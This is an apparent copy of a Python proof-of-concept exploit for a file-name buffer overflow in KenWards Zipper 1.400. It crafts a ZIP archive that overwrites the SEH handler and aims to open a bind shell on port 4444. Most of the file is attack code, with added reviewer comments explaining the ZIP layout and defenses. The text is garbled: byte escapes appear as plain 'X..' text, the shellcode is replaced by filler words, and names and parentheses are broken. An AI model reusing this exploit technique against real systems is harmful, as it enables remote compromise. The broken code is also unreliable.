#! /Usr/bin/python
# KenWards Zipper v1.400 File Name Buffer Overflow
# Coded by sinn3r (x90.sinner {at} gmail {d0t} com)
# Tested on: Windows XP SP3 ENG
# Reference: http://www.exploit-db.com/exploits/11834
# Big thanks to mr_me, and corelanc0d3r.
# Greetz to all the friends at Corelan Security Team & Exploit-DB... coolest people ever!
##
# Description:
# This exploit takes advantage of the fact that certain characters get mangled; as a result
# I was able to get a shell in a more straightforward way. Very interesting exercise.
# Mr_me and tecR0c figured out this trick, of course. But I was given the honor to share it.
# Script provided as is, without any warranty.
# Use for educational purposes only. Do not use this code to do anything illegal.
# Zip file format based on:
# http://en.wikipedia.org/wiki/ZIP_(file_format)
# ZIP "local file header" record (the PK\x03\x04 record); each quoted fragment is
# one field, in the order of the Wikipedia layout referenced above.
# NOTE(review): in this copy the byte values appear as plain "X.." text rather
# than escape sequences, so these literals document the intended header layout;
# they are not the binary a zip reader would parse.
# NOTE(review): the "File name length" field reads as 0x4fe4 (little-endian) here
# but as 0x0fe4 in the central directory header below, and the two "Compressed
# size" fields (0x0fef vs 0x0fe4) disagree as well -- possibly transcription
# errors. Either way, a file-name-length field in the thousands of bytes is the
# anomalous feature a defensive archive scanner can key on; a legitimate name
# length is bounded by the actual name that follows the header.
# The name / extra-field fragments are commented out because the Zip assembly at
# the bottom of the file places the Payload string here instead.
Local_file_header = (
"X50x4Bx03x04" # Local file header signature
"X00x02" # Version needed to extract
"X00x08" # General purpose bit flag
"X00xDA" # Compression method
"XA2x48" # File last modification time
"X3BxF6" # File last modification date
"X66x18x0Dx4E" # CRC-32
"XEFx0Fx00x00" # Compressed size (payload size)
"X14x00x00x00" # Uncompressed size
"Xe4x4f" # File name length
"X04x00" # Extra field length
# "X73x65x63x72x65x74x73" # File name (n) ASCII "secrets"
# "X42x42x42x42" # Extra field (m)
);
# ZIP "central directory file header" record (the PK\x01\x02 record), same
# field-per-fragment convention as Local_file_header above.
# NOTE(review): as with the local header, the "X.." text here stands in for byte
# escapes; read it as a layout description, not as parseable binary.
# The name length (0x0fe4 little-endian = 4068, matching the "4064 + 4 bytes"
# note further down) is the attacker-controlled 16-bit value that a parser must
# validate before copying the name into any fixed-size buffer; the trailing
# name / extra / comment fragments are commented out because the Zip assembly
# below appends the Payload string in their place.
Central_directory_file_header = (
"X50x4bx01x02" # Central directory file header signature
"X14x00" # Version made
"X14x00" # Version needed to extract
"X00x08" # General purpose bit flag
"X00xDA" # Compression method
"XA2x48" # File last modification time
"X3BxF6" # File last modification date
"X66x18x0Dx4E" # CRC-32
"XE4x0Fx00x00" # Compressed size (payload size)
"X14x00x00x00" # Uncompressed size
"Xe4x0f" # File name length (n)
"X04x00" # Extra field length (m)
"X04x00" # File comment length
"X00x01" # Disk number where file starts
"X00x00" # Internal file attributes
"X20x00x00x00" # External file attributes
"X00x00x00x00" # Relative offset of local file header
# "X73x65x63x72x65x74x73" # File name (n) ASCII "secrets"
# "X42x42x42x42" # Extra field (m)
# "X43x43x43x43" # File comment (k)
);
# ZIP "end of central directory" record (the PK\x05\x06 record) that closes the
# archive: one entry on one disk, central directory size 0x1012 at offset 0x1002
# (little-endian, per the inline comments these are "directory + payload" and
# "local header + payload" respectively), and an empty archive comment.
# NOTE(review): "X.." text stands in for byte escapes here as in the other
# header blocks.
End_of_central_directory_record = (
"X50x4Bx05x06" # End of central directory signature
"X00x00" # Number of this disk
"X00x00" # Disk where central directory starts
"X01x00" # Number of central directory records on this disk
"X01x00" # Total number of central directory records
"X12x10x00x00" # Size of central directory (central directory size + payload)
"X02x10x00x00" # Offset of start of central directory, relative to start of archive (lfh + payload)
"X00x00" # Zip file comment length (n)
);
# Align EAX for the base address of the alpha2 encoded bindshell
# Short instruction stub placed in front of the alphanumeric shellcode: three
# add-eax instructions, a JB, and 12 filler bytes (see the inline comments).
# Note the first four fragments rely on implicit string-literal concatenation,
# while the last two are joined with an explicit "+"; `"X41" * 12` binds before
# that "+" as written.
# NOTE(review): the "X.." text stands in for byte escapes, as elsewhere in this
# copy, so this is documentation of the stub rather than executable bytes.
AlignEAX = (
"X05x10x7Ex10x7E" # add eax, 0x7e0000e10
"X05x09x75x01x7E" # add eax, 0x7E017509
"X05x02x03x01x04" # add eax, 0x04010302
"X72x07" + # JB jump over the bytes we cant overwrite
"X41" * 12 # NOPs
);
# Windows/shell_bind_tcp lport = 4444 exitfunc = seh
# Alpha2 eax -- uppercase 744 bytes
# Placeholder for the bind-shell payload described in the comment above.
# NOTE(review): the 744-byte alphanumeric shellcode of the original PoC is not
# present in this copy -- the literals below are filler words -- so
# len(Shellcode) here is far shorter than the padding arithmetic in Payload
# assumes. Treat this block as a redacted stand-in, not as the original
# payload; nothing here is executable.
Shellcode = ("response"
"Province"
"Province"
"Province"
"Province"
"Province"
"Province"
"Province"
"Success ")
#4064 + 4 bytes
# Pointer to next SEH record: 1022 bytes
# SE handler: 1026 bytes
# The oversized "file name" string that is appended after each header in Zip
# below. The inline comments give the intended layout: filler up to the SEH
# record offsets quoted above (next-SEH at 1022, handler at 1026), the stub and
# shellcode, a short jump, the handler address 0x0041277E, more filler, and a
# fake ".bin" name so the entry looks like an ordinary file.
# NOTE(review): as written this block is not valid Python -- the parentheses on
# the padding line are unbalanced and the identifiers it calls len() on do not
# match the casing of the definitions above -- so the file does not run. It is
# kept byte-identical as an archival copy of the 2010 exploit-db PoC.
# Defender's note: this is a classic SEH-overwrite via an unchecked 16-bit name
# length; bounding the copy to the destination buffer size fixes the bug, and
# SafeSEH/SEHOP/DEP reduce what such an overwrite can achieve even unfixed.
Payload = (
"X41" * (1017-len (alignEAX)-len (shellcode) + # Padding
AlignEAX + # Align EAX for the bindshell
Shellcode + # Bindshell lport 4444
"X82x85x81x98x98" # This will get mangled and become "xE9xE0xFCxFFxFF"
"X73x97x42x42" # JNB 0x97 = JNB 0xF9 = Same as EB 0xFB = Rewind 5 bytes
"X7Ex27x41x00" + # pop ret = 0x0041277E
"X44" * 3034 + # Padding
". Bin" # Fake name
);
# Create the ZIP structure with our payload
# Assemble the archive: local header, then the Payload string standing in for
# the file name, then the central directory header with the same Payload again,
# then the end-of-central-directory record. Both headers advertise a name length
# in the thousands of bytes, which is what makes the trailing Payload look like
# a name to a parser that trusts that field.
# NOTE(review): nothing is written to disk in the visible part of this file; the
# variable is only built. Because Payload does not parse (see its note), this
# assignment is never reached as written.
Zip = (
Local_file_header +
Payload +
Central_directory_file_header +
Payload +
End_of_central_directory_record
);